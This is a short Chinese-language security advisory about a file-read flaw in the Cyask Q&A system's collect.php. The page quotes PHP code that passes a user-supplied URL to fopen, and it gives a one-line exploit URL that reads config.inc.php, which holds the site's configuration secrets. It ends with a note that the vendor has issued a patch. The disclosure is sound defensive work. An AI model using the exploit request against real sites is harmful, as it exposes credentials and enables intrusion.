cyask知道系统collect.php页面存在越权漏洞
<p>影响版本: <br />Cyask</p><p>程序介绍: <br />Cyask国内较为多人使用的仿百度风格的Ask系统。</p>
<p>漏洞分析:</p>
<p><br />从Collect.php代码当中可以看到</p>
<p><br />else <br />{ <br />/* <br />检查网址 <br />*/ <br />$url=get_referer(); <br />$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']); <br /> <br />$collect_url=emptyempty($neturl) ? $url : $neturl; <br /> <br />$contents = ”; <br />if(<font color="#ff0000">$fid=@fopen($collect_url,”r</font>“)) <br />{ <br />do <br />{ <br />$data = fread($fid, 4096); <br />if (strlen($data) == 0) <br />{ <br />break; <br />} <br />$contents .= $data; <br />} <br />while(true); <br />fclose($fid); <br />} <br />else <br />{ <br />show_message(’collect_url_error’, ”); <br />exit; <br />} </p>
<p><br />漏洞利用: <br /><font color="#ff0000">http://www.target.com/collect.php?neturl=config.inc.php</font></p>
<p>解决方案: <br />厂商补丁: <br />cyask <br />------- <br />目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载</p>
頁:
[1]